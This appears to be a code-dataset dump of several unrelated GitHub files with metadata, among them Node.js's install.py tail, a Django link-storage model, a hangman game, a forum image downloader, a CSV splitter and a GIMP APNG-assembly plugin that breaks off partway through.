npm_files(action)\n\n if 'true' == variables.get('node_install_corepack'):\n corepack_files(action)\n\n headers(action)\n\ndef headers(action):\n def wanted_v8_headers(files_arg, dest):\n v8_headers = [\n # The internal cppgc headers are depended on by the public\n # ones, so they need to be included as well.\n 'deps/v8/include/cppgc/internal/api-constants.h',\n 'deps/v8/include/cppgc/internal/atomic-entry-flag.h',\n 'deps/v8/include/cppgc/internal/base-page-handle.h',\n 'deps/v8/include/cppgc/internal/caged-heap-local-data.h',\n 'deps/v8/include/cppgc/internal/caged-heap.h',\n 'deps/v8/include/cppgc/internal/compiler-specific.h',\n 'deps/v8/include/cppgc/internal/finalizer-trait.h',\n 'deps/v8/include/cppgc/internal/gc-info.h',\n 'deps/v8/include/cppgc/internal/logging.h',\n 'deps/v8/include/cppgc/internal/member-storage.h',\n 'deps/v8/include/cppgc/internal/name-trait.h',\n 'deps/v8/include/cppgc/internal/persistent-node.h',\n 'deps/v8/include/cppgc/internal/pointer-policies.h',\n 'deps/v8/include/cppgc/internal/write-barrier.h',\n # cppgc headers\n 'deps/v8/include/cppgc/allocation.h',\n 'deps/v8/include/cppgc/common.h',\n 'deps/v8/include/cppgc/cross-thread-persistent.h',\n 'deps/v8/include/cppgc/custom-space.h',\n 'deps/v8/include/cppgc/default-platform.h',\n 'deps/v8/include/cppgc/ephemeron-pair.h',\n 'deps/v8/include/cppgc/explicit-management.h',\n 'deps/v8/include/cppgc/garbage-collected.h',\n 'deps/v8/include/cppgc/heap-consistency.h',\n 'deps/v8/include/cppgc/heap-handle.h',\n 'deps/v8/include/cppgc/heap-state.h',\n 'deps/v8/include/cppgc/heap-statistics.h',\n 'deps/v8/include/cppgc/heap.h',\n 'deps/v8/include/cppgc/liveness-broker.h',\n 'deps/v8/include/cppgc/macros.h',\n 'deps/v8/include/cppgc/member.h',\n 'deps/v8/include/cppgc/name-provider.h',\n 'deps/v8/include/cppgc/object-size-trait.h',\n 'deps/v8/include/cppgc/persistent.h',\n 'deps/v8/include/cppgc/platform.h',\n 'deps/v8/include/cppgc/prefinalizer.h',\n 'deps/v8/include/cppgc/process-heap-statistics.h',\n 'deps/v8/include/cppgc/sentinel-pointer.h',\n 'deps/v8/include/cppgc/source-location.h',\n 'deps/v8/include/cppgc/testing.h',\n 'deps/v8/include/cppgc/trace-trait.h',\n 'deps/v8/include/cppgc/type-traits.h',\n 'deps/v8/include/cppgc/visitor.h',\n # libplatform headers\n 'deps/v8/include/libplatform/libplatform-export.h',\n 'deps/v8/include/libplatform/libplatform.h',\n 'deps/v8/include/libplatform/v8-tracing.h',\n # v8 headers\n 'deps/v8/include/v8-array-buffer.h',\n 'deps/v8/include/v8-callbacks.h',\n 'deps/v8/include/v8-container.h',\n 'deps/v8/include/v8-context.h',\n 'deps/v8/include/v8-cppgc.h',\n 'deps/v8/include/v8-data.h',\n 'deps/v8/include/v8-date.h',\n 'deps/v8/include/v8-debug.h',\n 'deps/v8/include/v8-embedder-heap.h',\n 'deps/v8/include/v8-embedder-state-scope.h',\n 'deps/v8/include/v8-exception.h',\n 'deps/v8/include/v8-extension.h',\n 'deps/v8/include/v8-external.h',\n 'deps/v8/include/v8-forward.h',\n 'deps/v8/include/v8-function-callback.h',\n 'deps/v8/include/v8-function.h',\n 'deps/v8/include/v8-handle-base.h',\n 'deps/v8/include/v8-initialization.h',\n 'deps/v8/include/v8-internal.h',\n 'deps/v8/include/v8-isolate.h',\n 'deps/v8/include/v8-json.h',\n 'deps/v8/include/v8-local-handle.h',\n 'deps/v8/include/v8-locker.h',\n 'deps/v8/include/v8-maybe.h',\n 'deps/v8/include/v8-memory-span.h',\n 'deps/v8/include/v8-message.h',\n 'deps/v8/include/v8-microtask-queue.h',\n 'deps/v8/include/v8-microtask.h',\n 'deps/v8/include/v8-object.h',\n 'deps/v8/include/v8-persistent-handle.h',\n 'deps/v8/include/v8-platform.h',\n 'deps/v8/include/v8-primitive-object.h',\n 'deps/v8/include/v8-primitive.h',\n 'deps/v8/include/v8-profiler.h',\n 'deps/v8/include/v8-promise.h',\n 'deps/v8/include/v8-proxy.h',\n 'deps/v8/include/v8-regexp.h',\n 'deps/v8/include/v8-script.h',\n 'deps/v8/include/v8-snapshot.h',\n 'deps/v8/include/v8-source-location.h',\n 'deps/v8/include/v8-statistics.h',\n 'deps/v8/include/v8-template.h',\n 'deps/v8/include/v8-traced-handle.h',\n 'deps/v8/include/v8-typed-array.h',\n 'deps/v8/include/v8-unwinder.h',\n 'deps/v8/include/v8-value-serializer.h',\n 'deps/v8/include/v8-value.h',\n 'deps/v8/include/v8-version.h',\n 'deps/v8/include/v8-wasm.h',\n 'deps/v8/include/v8-weak-callback-info.h',\n 'deps/v8/include/v8.h',\n 'deps/v8/include/v8config.h',\n ]\n files_arg = [name for name in files_arg if name in v8_headers]\n action(files_arg, dest)\n\n def wanted_zoslib_headers(files_arg, dest):\n import glob\n zoslib_headers = glob.glob(zoslibinc + '/*.h')\n files_arg = [name for name in files_arg if name in zoslib_headers]\n action(files_arg, dest)\n\n action([\n 'common.gypi',\n 'config.gypi',\n 'src/node.h',\n 'src/node_api.h',\n 'src/js_native_api.h',\n 'src/js_native_api_types.h',\n 'src/node_api_types.h',\n 'src/node_buffer.h',\n 'src/node_object_wrap.h',\n 'src/node_version.h',\n ], 'include/node/')\n\n # Add the expfile that is created on AIX\n if sys.platform.startswith('aix') or sys.platform == \"os400\":\n action(['out/Release/node.exp'], 'include/node/')\n\n subdir_files('deps/v8/include', 'include/node/', wanted_v8_headers)\n\n if 'false' == variables.get('node_shared_libuv'):\n subdir_files('deps/uv/include', 'include/node/', action)\n\n if 'true' == variables.get('node_use_openssl') and \\\n 'false' == variables.get('node_shared_openssl'):\n subdir_files('deps/openssl/openssl/include/openssl', 'include/node/openssl/', action)\n subdir_files('deps/openssl/config/archs', 'include/node/openssl/archs', action)\n subdir_files('deps/openssl/config', 'include/node/openssl', action)\n\n if 'false' == variables.get('node_shared_zlib'):\n action([\n 'deps/zlib/zconf.h',\n 'deps/zlib/zlib.h',\n ], 'include/node/')\n\n if sys.platform == 'zos':\n zoslibinc = os.environ.get('ZOSLIB_INCLUDES')\n if not zoslibinc:\n raise RuntimeError('Environment variable ZOSLIB_INCLUDES is not set\\n')\n if not os.path.isfile(zoslibinc + '/zos-base.h'):\n raise RuntimeError('ZOSLIB_INCLUDES is not set to a valid location\\n')\n subdir_files(zoslibinc, 'include/node/zoslib/', wanted_zoslib_headers)\n\ndef run(args):\n global node_prefix, install_path, target_defaults, variables\n\n # chdir to the project's top-level directory\n os.chdir(abspath(os.path.dirname(__file__), '..'))\n\n conf = load_config()\n variables = conf['variables']\n target_defaults = conf['target_defaults']\n\n # argv[2] is a custom install prefix for packagers (think DESTDIR)\n # argv[3] is a custom install prefix (think PREFIX)\n # Difference is that dst_dir won't be included in shebang lines etc.\n dst_dir = args[2] if len(args) > 2 else ''\n\n if len(args) > 3:\n node_prefix = args[3]\n\n # install_path thus becomes the base target directory.\n install_path = dst_dir + node_prefix + '/'\n\n cmd = args[1] if len(args) > 1 else 'install'\n\n if os.environ.get('HEADERS_ONLY'):\n if cmd == 'install':\n headers(install)\n return\n if cmd == 'uninstall':\n headers(uninstall)\n return\n else:\n if cmd == 'install':\n files(install)\n return\n if cmd == 'uninstall':\n files(uninstall)\n return\n\n raise RuntimeError('Bad command: %s\\n' % cmd)\n\nif __name__ == '__main__':\n run(sys.argv[:])\n","repo_name":"nodejs/node","sub_path":"tools/install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":13771,"program_lang":"python","lang":"en","doc_type":"code","stars":99492,"dataset":"github-code","pt":"61"} +{"seq_id":"19784733636","text":"from amath.DataTypes.Function import Function\nfrom amath.Errors import Failure\nfrom collections import OrderedDict as OD\nfrom urllib.parse import urlencode\nfrom urllib.request import urlopen\n\n\ndef formulaLookup(x):\n \"\"\"Lookup formulas\"\"\"\n\n def wolfram_cloud_call(**args):\n arguments = dict([(key, arg) for key, arg in args.items()])\n try:\n result = urlopen(\"http://www.wolframcloud.com/objects/5c991864-3fbd-4b30-8200-d1a398aee0e2\",\n urlencode(arguments).encode(\"ascii\"))\n except:\n raise Failure(\"Cannot connect to servers\")\n return result.read()\n\n textresult = wolfram_cloud_call(x=x)\n return textresult.decode(\"ascii\")\n\n\ndef formulaData(x):\n def wolfram_cloud_call(**args):\n arguments = dict([(key, arg) for key, arg in args.items()])\n try:\n result = urlopen(\"http://www.wolframcloud.com/objects/724d6409-5efb-4bcb-907a-6897aad95193\",\n urlencode(arguments).encode(\"ascii\"))\n except:\n raise Failure(\"Cannot connect to servers\")\n return result.read()\n\n textresult = wolfram_cloud_call(x=x)\n return textresult.decode(\"ascii\")\n\n\nEnergy = Function(OD([('m', 'Real')]), 'm*(c**2)')\n\nGravitationalForce = Function(OD([('m1', 'Real'), ('m2', 'Real'), ('d', 'Real')]), '(G*m1*m2)/(d**2)')\n\nPythagorean = Function(OD([('a', 'Real'), ('b', 'Real')]), 'sqrt((a**2)+(b**2))')\n\nStandardNormalDistribution = Function(OD([('x', 'Real')]), '(e**(-(1/2.0)*(x**2)))/sqrt(2*pi)')\n\nLorentzFactor = Function(OD([('v', \"Real\")]), \"1.0/sqrt(1-(v**2)/(c**2))\")\n\nKineticEnergy = Function(OD([('m', \"Real\"), ('v', \"Real\")]), \"(1/2.0)*m*(v**2)\")\n\nMomentum = Function(OD([('k', \"Real\"), ('m', \"Real\")]), \"sqrt(2)*sqrt(k*m)\")\n\nMinimumPowerRequiredToMoveObject = Function(OD([('D', \"Real\"), ('m', \"Real\"), ('t', \"Real\")]), \"(4*(D**2)*m)/(t**3)\")\n\nVelocity = Function(OD([('s', \"Real\"), ('t', \"Real\")]), \"s/t\")\n\nAcceleration = Function(OD([('v', \"Real\"), ('t', \"Real\")]), 'v/t')\n\n\ndef HarmonicNumber(n):\n from .stats.stats import sum\n return sum(lambda x: 1 / x, 1, n)\n","repo_name":"ansg191/Math_Language","sub_path":"amath/formulas.py","file_name":"formulas.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38532102346","text":"def token_transform(tokens, s):\n \"\"\"Return the transformed version of string s,\n where all tokens(included the nested ones too) replaced.\n >>> tokens = {\\\n '$LOCATION$': '$ANIMAL$ park',\\\n '$ANIMAL$': 'dog',\\\n }\n >>> token_transform(tokens, 'Walk the $ANIMAL$ in the $LOCATION$!')\n 'Walk the dog in the dog park!'\n \"\"\"\n result_lst = []\n i, j = 0, 1\n while i < len(s):\n if s[i] != \"$\":\n result_lst.append(s[i])\n i += 1\n j = i + 1\n elif s[j] != \"$\":\n j += 1\n else:\n key = s[i:j+1]\n value = tokens[key]\n evaluated_value = token_transform(tokens, s=value)\n tokens[key] = evaluated_value #this will act as a memoization\n result_lst.append(evaluated_value)\n i = j + 1\n j = i + 1\n\n return ''.join(result_lst)\n\ndef testing():\n tokens = {\n '$B$': \"epicly $C$\",\n '$A$': \"pretty $B$ problem $D$\",\n '$D$': \"we have\",\n '$C$': \"clever\",\n }\n print(f\"tokens before the memoization\")\n for token_item in tokens.items():\n print(token_item)\n\n result = 'What a pretty epicly clever problem we have here!'\n assert token_transform(tokens, s=\"What a $A$ here!\") == result, f\"should be '{result}'\"\n print(f\"tokens after the memoization\")\n for token_item in tokens.items():\n print(token_item)\n\nif __name__ == \"__main__\":\n testing()\n print(\"=\"*20)\n print(\"Everything passed\")\n","repo_name":"dragoeast/projects","sub_path":"data_structures/dynamic_programming/token_transform.py","file_name":"token_transform.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9802345388","text":"from django.db import models\nfrom django.utils import timezone\n# from urllib.parse import urlparse\nfrom django.contrib.auth.models import User\n\n# category\n\n\nclass Category(models.Model):\n title = models.CharField(max_length=50)\n\n def __str__(self):\n return self.title\n\n class Meta:\n verbose_name = \"Category\"\n verbose_name_plural = \"Categories\"\n\n\n# storage\nclass Storage(models.Model):\n author = models.ForeignKey('auth.User', on_delete=models.CASCADE)\n title = models.CharField(max_length=255)\n description = models.TextField(blank=True)\n # link_path = models.URLField(max_length=250, unique=True)\n link_path = models.CharField(max_length=250)\n cover = models.ImageField(\n upload_to='assets/', blank=True, default=\"assets/default-img.jpg\")\n cover_url = models.CharField(\n max_length=500, default=\"assets/default-img.jpg\", blank=True)\n alt = models.CharField(max_length=255)\n category = models.ForeignKey(Category, related_name='category',\n null=True, on_delete=models.CASCADE)\n private = models.BooleanField(default=False)\n created_date = models.DateTimeField(default=timezone.now)\n favorite = models.ManyToManyField(\n User, related_name='favorite', blank=True)\n\n def __str__(self):\n return self.title\n\n # def url_text(request, self):\n # parsed_url = urlparse(self.link_path)\n # return parsed_url.hostname.replace(\"www.http://localhost:8000/storage/\", \"\") + \"/...\"\n\n\n# favorites\nclass Favorites(models.Model):\n favorites = models.ManyToManyField(Storage, related_name='favorites')\n # favorite = models.ForeignKey(\n # 'Storage', related_name='favorites', null=True, on_delete=models.CASCADE)\n","repo_name":"nataliadelina/linkstorage","sub_path":"storage/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5748838184","text":"import re\nimport os\nerros=['/','\\\\','|','/','\\\\','|','O']\nerro=[' ',' ',' ',' ',' ',' ',' ']\ndef corpo(letras,string):#define o corpo\n print(f'Letras usadas:{letras}\\n',\n ' ________\\n',\n '| |\\n',\n '| |\\n',\n f'| {erro[6]}\\n',\n f'| {erro[3]}{erro[5]}{erro[4]}\\n',\n f'| {erro[2]}\\n',\n f'| {erro[0]} {erro[1]}\\n',\n f'| {re.sub(\"_\", \"_ \",string)}\\n')\n\ndef partida():#inicia a partida\n vidas=7\n letras_usadas=''\n palavra=input(\"Palavra:\")\n palavra_oculta=re.sub('[a-z]|[A-Z]', '_',palavra)# troca as letras por _\n os.system('cls')#apaga o console\n corpo(letras_usadas,palavra_oculta)\n while palavra_oculta!=palavra and vidas!=0:\n jogador_letra=input('Digite uma letra: ')\n acerto=0\n\n\n for i in range(len(palavra)):\n if jogador_letra.lower()==palavra[i] or jogador_letra.upper()==palavra[i]:\n aux = list(palavra_oculta)#transforma em lista\n aux[i] = palavra[i]\n palavra_oculta = \"\".join(aux)#une a lista\n acerto=1\n elif acerto==0 and i==(len(palavra)-1):\n erro[vidas-1]=erros[vidas-1]\n vidas-=1\n os.system('cls')\n letras_usadas+=jogador_letra + '-'\n corpo(letras_usadas,palavra_oculta)\n if palavra_oculta==palavra:\n print('Parabens, você ganhou')\n else: \n print('Que pena, você perdeu')\n nova_partida=input('Nova partida(s/n)? ')\n os.system('cls')\n if nova_partida.lower()=='s':\n partida()\npartida()\n","repo_name":"igorramiro/jogo-da-forca","sub_path":"forca.py","file_name":"forca.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3777339937","text":"\n## GRADIENT DESCENT VIZ - GUI dashboard\n# Last update: August 2016\n\n\n## INDEX\n# + Dashboard design\n# + Event handlers\n##\n\n\nfrom ipywidgets import widgets\nfrom IPython.display import display, clear_output\n\nfrom grad_desc_functionality import *\n\n\n## DASHBOARD DESIGN -----------------------------------------------------------\n\ndashboard = widgets.VBox()\n\n# Title and spacers\nheader = widgets.HTML(\"

Separation Hyperplane

\")\nvspace = widgets.HTML(\"
\")\nhspace = widgets.HTML(\"

--

\")\n\n# Style selection\nslope_slider = widgets.FloatSlider(\n value=2,\n min=-3,\n max=3,\n step=0.1,\n description='Initial Slope:',\n slider_color='blue'\n)\n\noffset_slider = widgets.FloatSlider(\n value=0.5,\n min=-3,\n max=3,\n step=0.1,\n description='Initial Offset:',\n slider_color='blue'\n)\n\nlearn_slider = widgets.FloatSlider(\n value=.5,\n min=0,\n max=1,\n step=0.1,\n description='Learn Rate:',\n slider_color='gray'\n)\n\nplot_button = widgets.Button(description=\"PLOT + Get Margin\")\n\nloss_select = widgets.Dropdown(options=['Hinge Loss', 'Zero-Plus Loss', 'Log Loss'])\n\n\n# HTML\nLOSS_TEMPLATE = '''

LOSS FUNCTIONS:

\n
    \n
  • Zero-One Loss: {zo}
  • \n
  • Hinge Loss: {hg:.2f}
  • \n
  • Log Loss: {log:.2f}
  • \n
\n'''\nloss_textarea = widgets.HTML(\n value='',\n )\n\n# Final Layout\nleft_panel = widgets.VBox(children=[slope_slider, vspace, offset_slider, vspace, learn_slider]) \nright_panel = widgets.VBox(children=[vspace, plot_button, vspace, loss_select]) \n\nfooter_panel = widgets.VBox(children=[hspace, loss_textarea])\nbody_panel = widgets.HBox(children=[left_panel, hspace, hspace, hspace, right_panel])\n\ndashboard.children = [header, vspace, body_panel, footer_panel]\n\n\n## EVENT HANDLERS -------------------------------------------------------------\n\ndef plot_on_demand(_):\n input_values = (slope_slider.value, offset_slider.value)\n loss_textarea.value = LOSS_TEMPLATE.format(zo=zero_plus_loss(*input_values),\n hg=hinge_loss(*input_values),\n log=log_loss(*input_values) )\n clear_output()\n grad_descent_plot(slope_slider.value, offset_slider.value, loss_select.value, learn_slider.value)\n\nplot_button.on_click(plot_on_demand)\n\n","repo_name":"WillahScott/grad_descent_viz","sub_path":"grad_desc_gui.py","file_name":"grad_desc_gui.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"18599110819","text":"import sys\nsys.setrecursionlimit(1000000)\nN,M=map(int,sys.stdin.readline().rstrip().split(\" \"))\nmatrix=[]\nfor i in range(N):\n temp=[0 for k in range(N)]\n matrix.append(temp)\n\nedge=[]\nfor i in range(M):\n u,v=map(int,sys.stdin.readline().rstrip().split(\" \"))\n edge.append([u,v])\n\nfor key in edge:\n matrix[key[0]-1][key[1]-1]=1\n matrix[key[1]-1][key[0]-1]=1\n\nvisited=[False for i in range(N)]\ndef DFS(matrix,visited,start):\n for i in range(N):\n if visited[i]==False and matrix[start][i]==1:\n visited[i]=True\n DFS(matrix,visited,i)\n\n\ncount=0\nstart=0\nfor i in range(N):\n if visited[i]==False:\n DFS(matrix,visited,i)\n count+=1\n\nprint(count)\n\n\n\n\n\n","repo_name":"Andrevile/Algorithm","sub_path":"BOJ PS/No.11724 연결 요소의 개수.py","file_name":"No.11724 연결 요소의 개수.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20207779238","text":"import sys\nimport os\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QFileDialog\nfrom PyQt5.QtCore import pyqtSlot\nfrom datetime import datetime\nimport time\nimport requests\nimport re\nfrom views.MainWindow import Ui_MainWindow\nfrom utils.mihoyoEnum import *\nfrom script.spider_mihoyo import SpiderMihoyo\n\nclass MainWin(QMainWindow, Ui_MainWindow):\n \n # 初始化界面\n def __init__(self):\n\n self.spider_plate = '' # 板块\n self.spider_type = '' # 类型\n self.start_num = 1 # 开始张数\n self.scroll_count = 0 # 滚动次数\n self.cwd = os.getcwd() # 获取当前程序文件位置\n\n self.spider = SpiderMihoyo() # 爬取类实例\n\n super(MainWin, self).__init__()\n self.setupUi(self)\n\n self.init_data()\n self.addEventListener()\n\n self.show()\n \n # 事件监听\n def addEventListener(self):\n self.plateBtn1.clicked.connect(self.plate_checked)\n self.plateBtn2.clicked.connect(self.plate_checked)\n self.plateBtn3.clicked.connect(self.plate_checked)\n self.plateBtn4.clicked.connect(self.plate_checked)\n\n self.typeBtn1.clicked.connect(self.type_checked)\n self.typeBtn2.clicked.connect(self.type_checked)\n self.typeBtn3.clicked.connect(self.type_checked)\n self.typeBtn4.clicked.connect(self.type_checked)\n\n self.startSpinBox.valueChanged.connect(self.spinBox_start)\n self.countSpinBox.valueChanged.connect(self.spinBox_count)\n\n self.pushButton.clicked.connect(self.confirm)\n self.chooseFileBtn.clicked.connect(self.choose_dir)\n\n\n # 执行\n def confirm(self):\n\n # 启动网页\n self.log('打开浏览器...')\n self.spider.start()\n self.log('开始爬取...')\n data_list = self.spider.data_spider(self.spider_plate, self.spider_type, self.scroll_count)\n self.log('爬取完成,开始下载...')\n desk = self.create_dir()\n self.download(data_list, desk)\n \n\n # 批量下载\n def download(self, data_list, desk):\n\n count = 0\n for i, data in enumerate(data_list):\n\n if i < self.start_num - 1:\n continue\n try:\n img = data['src'].partition('?')[0]\n suffix = re.findall(r'(.jpg|.jpeg|.png|.gif)$', img)[-1]\n file = f'{desk}/{count + 1}{suffix}'\n\n with open(file, 'wb') as f:\n self.log(f'下载 {img} ...')\n f.write(requests.get(img).content)\n count = count + 1\n \n time.sleep(0.5)\n\n except Exception:\n self.log(f'下载失败, {img}')\n\n self.log(f'下载完成, 共下载{count}张图片')\n\n\n # 选择目录\n def choose_dir(self):\n dir_choose = QFileDialog.getExistingDirectory(self, \"选取文件夹\", self.cwd) # 起始路径\n\n if dir_choose == \"\":\n return\n\n self.saveEditText.setText(dir_choose)\n\n\n # 创建目录\n def create_dir(self):\n \n desk = self.saveEditText.text()\n\n if not os.path.isdir(desk):\n os.makedirs(desk)\n \n return desk\n\n\n # 初始化数据\n def init_data(self):\n self.spinBox_start()\n self.spinBox_count()\n self.plate_checked()\n self.type_checked()\n \n\n # 开始位置\n def spinBox_start(self):\n self.start_num = self.startSpinBox.value()\n \n\n # 滚动次数\n def spinBox_count(self):\n self.scroll_count = self.countSpinBox.value()\n if self.scroll_count == '':\n self.scroll_count = 0\n\n\n # 板块事件\n def plate_checked(self):\n\n if self.plateBtn1.isChecked():\n self.spider_plate = GameType.BH2.value\n\n elif self.plateBtn2.isChecked():\n self.spider_plate = GameType.BH3.value\n\n elif self.plateBtn3.isChecked():\n self.spider_plate = GameType.YS.value\n\n elif self.plateBtn4.isChecked():\n self.spider_plate = GameType.DBY.value\n\n\n # 类型事件\n def type_checked(self):\n\n if self.typeBtn1.isChecked():\n self.spider_type = SearchType.LATEST_REPLY.value\n\n elif self.typeBtn2.isChecked():\n self.spider_type = SearchType.LATEST_RELEASE.value\n\n elif self.typeBtn3.isChecked():\n self.spider_type = SearchType.HOT.value\n\n elif self.typeBtn4.isChecked():\n self.spider_type = SearchType.GOOD.value\n\n\n # 在文本框打印\n def log(self, str):\n self.textEdit.append(str)\n QApplication.processEvents() # 刷新界面\n\n # 窗口关闭事件\n def closeEvent(self,e):\n self.spider.quit()","repo_name":"konghirt/spider_mys","sub_path":"spider_selenium/views/MyWin.py","file_name":"MyWin.py","file_ext":"py","file_size_in_byte":4738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21768345078","text":"import pandas as pd\nimport statsmodels.api as sm\nfrom sklearn.preprocessing import StandardScaler\nscale = StandardScaler()\n\ndf = pd.read_excel('cars.xls')\n\nf = open(\"results.txt\", \"w+\")\n\n# Choosing only three parameters from the I/P data\nX = df[['Mileage', 'Cylinder', 'Doors']]\ny = df['Price']\n\n#normalises the results in the range of [-1,1] in order to carry out the analysis\nX[['Mileage', 'Cylinder', 'Doors']] = scale.fit_transform(X[['Mileage', 'Cylinder', 'Doors']].as_matrix())\n\nf.write(str(X))\n\nest = sm.OLS(y, X).fit() # OLS - Ordinary Least Square for Multivariate Regression\n\nf.write(str(est.summary()))\n\n\n\n","repo_name":"krit-gpt/MachineLearning_Projects","sub_path":"Predictive_Modelling/car_prices/car_prices.py","file_name":"car_prices.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"2090449013","text":"# -*- coding: utf-8 -*-\r\n###############################################################################\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n###############################################################################\r\n\r\nfrom odoo import models, fields, api\r\n\r\n\r\nclass FeesDetailReportWizard(models.TransientModel):\r\n\r\n \"\"\" Admission Analysis Wizard \"\"\"\r\n _name = 'fees.detail.report.wizard'\r\n\r\n fees_filter = fields.Selection(\r\n [('student', 'Student'), ('course', 'Course')], 'Fees Filter',\r\n required=True)\r\n student_id = fields.Many2one('lxb.student', 'Student')\r\n course_id = fields.Many2one('lxb.course', 'Course')\r\n\r\n @api.multi\r\n def print_report(self):\r\n data = {}\r\n if self.fees_filter == 'student':\r\n data['fees_filter'] = self.fees_filter\r\n data['student'] = self.student_id.id\r\n else:\r\n data['fees_filter'] = self.fees_filter\r\n data['course'] = self.course_id.id\r\n\r\n report = self.env.ref(\r\n 'lxb-fees.action_report_fees_detail_analysis')\r\n return report.report_action(self, data=data)\r\n","repo_name":"ScottAI/-Odoo---","sub_path":"lexuebao/lxb-fees/wizard/fees_detail_report_wizard.py","file_name":"fees_detail_report_wizard.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"61"} +{"seq_id":"4650446632","text":"import csv\nimport sys\n\ncsv.field_size_limit(sys.maxsize)\n\ndef main():\n if sys.argv[1] == '-t':\n with open(sys.argv[2],'r') as file:\n print(len(file.readlines()))\n sys.exit()\n if sys.argv[1] == '-m':\n with open(sys.argv[2],'w') as output:\n for i in range(3, int(len(sys.argv))):\n with open(sys.argv[i],'r') as file:\n lines = file.readlines()\n output.writelines(lines)\n sys.exit()\n if sys.argv[1] == '-n':\n map = dict()\n for i in range(3, int(len(sys.argv))):\n f = open(sys.argv[i], 'r')\n size = f.readlines()\n f.close()\n with open(sys.argv[i],'r') as file:\n for j in range (0, len(size)):\n line = size[j]\n if len(line) < 3:\n continue\n \n tailLength_num = line.split(',')\n print(tailLength_num[0])\n if tailLength_num[0] in map:\n map[tailLength_num[0]] += int(tailLength_num[1])\n else:\n map[tailLength_num[0]] = int(tailLength_num[1])\n with open(sys.argv[2],'w') as output:\n for key in map:\n output.write(key + ',' + str(map[key]) + '\\n')\n sys.exit()\n if sys.argv[1] == '-l':\n output = open(sys.argv[3], 'w')\n discard = 0\n with open(sys.argv[2],'r') as file:\n csvreader = csv.reader(file, delimiter=' ')\n for row in csvreader:\n if len(row) < 2:\n discard += 1\n print(\"Discard #\" + str(discard))\n print(row)\n continue\n editscript = row[1].split('|')\n for i in range(0, len(editscript)):\n if editscript[i] == '':\n del editscript[i]\n #print(row[0] + \": \" + str(len(editscript)))\n output.write(row[0] + \",\" + str(len(editscript)) + '\\n')\n output.close()\n sys.exit()\n \n if len(sys.argv) != 4 and (sys.argv[1] != '-m' or sys.argv[1] != '-t'):\n print('Usage: csv_divider.py [option] ')\n print('option: -m merge csv file into n files')\n print('option: -t test')\n print('option: -l calculate the length of each tail')\n sys.exit(1)\n \n \n with open(sys.argv[1],'r') as file:\n tmp = []\n lines = file.readlines()\n size = len(lines)\n divisor = int(len(lines)/int(sys.argv[3]))\n j = 0\n k = 1\n for i in range(0, size):\n tmp.append(lines[i])\n if j > divisor or i == size -1:\n j = 0\n with open(sys.argv[2] + '_' + str(k) + '.csv', 'w') as output:\n output.writelines(tmp)\n tmp = []\n k += 1\n \n j += 1\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"LuZack/2023_KCSE_ACEA","sub_path":"csv_divider.py","file_name":"csv_divider.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12639892013","text":"#!/usr/bin/env python\n\nfrom gimpfu import *\nimport os\nimport json\nfrom os import unlink, listdir, chdir\nfrom os.path import isfile, join\nimport subprocess\n\nasm = 'apngasm'\ns = '-s'\nl = '-l'\ncombine = ''\nmetafile = 'layermeta.json'\n\nformstr = ' {0}'\n\ndef get_pngs(path):\n tmp = [i for i in listdir(path) if isfile(join(path, i))]\n tmp2 = [y for y in tmp if '.png' in y]\n tmp2.sort()\n return tmp2\n\ndef assemble_apng(img, drw, filename, filepath, skip, loop):\n\t# removing potential previous animations\n\toutfile = os.path.join(filepath, filename)\n\tpl = get_pngs(filepath)\n\n\tchdir(filepath)\n\tfor i in pl:\n\t\tif isfile(i):\n\t\t\tunlink(i)\n\n\t# create frames and data\n\tpdb.python_fu_export_image_layers(img, drw, filepath)\n\n\t# write command line\n\tmetaoutfile = join(filepath, metafile)\n\tpnglist = get_pngs(filepath)\n\n\t## configuration\n\tglobal asm\n\tcmdline = []\n\tcmdline.append(asm)\n\tif skip:\n\t\tcmdline.append(s)\n\tif loop>0:\n\t\tcmdline.append(l)\n\t\tcmdline.append(loop)\n\n\t## frames\n\twith open(metaoutfile, 'r') as fmeta:\n\t\tframedata = json.load(fmeta)\n\tfor i in pnglist:\n\t\tmd = framedata[i]\n\t\tcmdline.append(i)\n\t\tdur = int(md[0])\n\t\tcmdline.append(str(dur))\n\n\tpdb.gimp_message(cmdline)\n\n\t# assemble animation\n\tsubprocess.call(cmdline)\n\nregister(\n\t\"assemble_apng\",\n\t\"create an animated PNG\",\n\t\"take a list of frames and metadata and create an animated PNG with an external assembler\",\n\t\"me\",\n\t\"me\",\n\t\"2018\",\n\t\"/Python-Fu/APNGAssembler\",\n\t\"* or RGB* or other filetype\",\n\t[\n\t(PF_FILENAME, \"filename\", \"Output file\", \"output.png\"),\n\t(PF_DIRNAME, \"filepath\", \"Output directory\", \"/tmp\"),\n\t(PF_BOOL, \"skip\" ,\"First frame is not part of the animation\", True),\n\t(PF_SPINNER, \"loop\" ,\"Times the animation loops 